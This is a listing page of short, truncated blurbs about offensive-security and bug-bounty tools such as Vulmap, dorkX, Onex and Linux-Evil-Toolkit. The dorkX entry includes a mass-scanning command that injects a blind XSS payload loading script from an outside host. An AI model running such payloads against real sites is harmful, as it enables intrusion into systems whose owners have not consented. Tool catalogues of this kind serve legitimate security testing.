MobileHackersWeapons – Mobile Hacker’s Weapons / A Collection Of Cool Tools Used By Mobile Hackers

A collection of cool tools used by Mobile hackers. Happy hacking , Happy bug-hunting  Weapons OS Type Name Description All Analysis RMS-Runtime-Mobile-Security Runtime Mobile Security (RMS) – is a powerful web interface that helps you to manipulate Android and iOS Apps at Runtime All Analysis scrounger Mobile application testing toolkit All Proxy BurpSuite The BurpSuiteRead More

Vulmap – Web Vulnerability Scanning And Verification Tools

Vulmap is a vulnerability scanning tool that can scan for vulnerabilities in Web containers, Web servers, Web middleware, and CMS and other Web programs, and has vulnerability exploitation functions. Relevant testers can use vulmap to detect whether the target has a specific vulnerability, and can use the vulnerability exploitation function to verify whether the vulnerabilityRead More

Bheem – Simple Collection Of Small Bash-Scripts Which Runs Iteratively To Carry Out Various Tools And Recon Process

Project Bheem is a simple collection of small bash-scripts which runs iteratively to carry out various tools and recon process & store output in an organized way. This project was created initially for automation of Recon for personal usage and was never meant to be public as there is nothing fancy about it but dueRead More

Linux-Evil-Toolkit – A Framework That Aims To Centralize, Standardize And Simplify The Use Of Various Security Tools For Pentest Professionals

Linux evil toolkit is a framework that aims to centralize, standardize and simplify the use of various security tools for pentest professionals.LETK (Linux evil toolkit) has few simple commands, one of which is theINIT that allows you to define a target, and thus use all the tools without typing anything else.Is LETK better than setoolkit?Read More

Nuubi Tools – Information Ghatering, Scanner And Recon

Nuubi Tools: Information-ghatering|Scanner|Recon Options: -h/–help | Show help message and exitArguments: -b/–banner | Banner grabing of target ip address -s/–subnet | Subnetlookup of target -c/–cms | Cms detect with headers -d/–dns | Dnslookup of target domain -e/–extract | Extract links from target url(https/http) -H/–http | Httpheaders of target url -n/–nmap | Nmapscan of target domainRead More

dorkX – Pipe Different Tools With Google Dork Scanner

Pipe different tools with google dork Scanner Install [email protected] ~/dorkX> git clone https://github.com/ethicalhackingplayground/dorkX [email protected] ~/dorkX> cd dorkX [email protected] ~/dorkX> go build dorkx.go [email protected] ~/dorkX> go build corsx.go [email protected] ~/dorkX> go build csrfx.go [email protected] ~/dorkX> go build zin.go Usage: Blind XSS [email protected] ~/dorkX> ./dorkX -dorks dorks.txt -concurrency 100 | dalfox pipe -b ‘”><script src=https://z0id.xss.ht></script>’   XSSRead More

Quiver – Tool To Manage All Of Your Tools For Bug Bounty Hunting And Penetration Testing

Quiver is the tool to manage all of your tools. It’s an opinionated and curated collection of commands, notes and scripts for bug bounty hunting and penetration testing. Features ZSH / Oh-My-ZSH shell plugin Tab auto-completion Global variables Prefills the command line, doesn’t hide commands from you Built-in logbook for on-the-fly notes, saving commands RendersRead More

Onex – A Library Of Hacking Tools For Termux And Other Linux Distributions

“onex a hacking tools library.” Onex is a kali linux hacking tools installer for termux and other linux distribution. It’s package manager for hacker’s. onex manage large number’s of hacking tools that can be installed on single click.Using onex, you can install all hacking tools in Termux and other Linux based distributions. onex can installRead More

X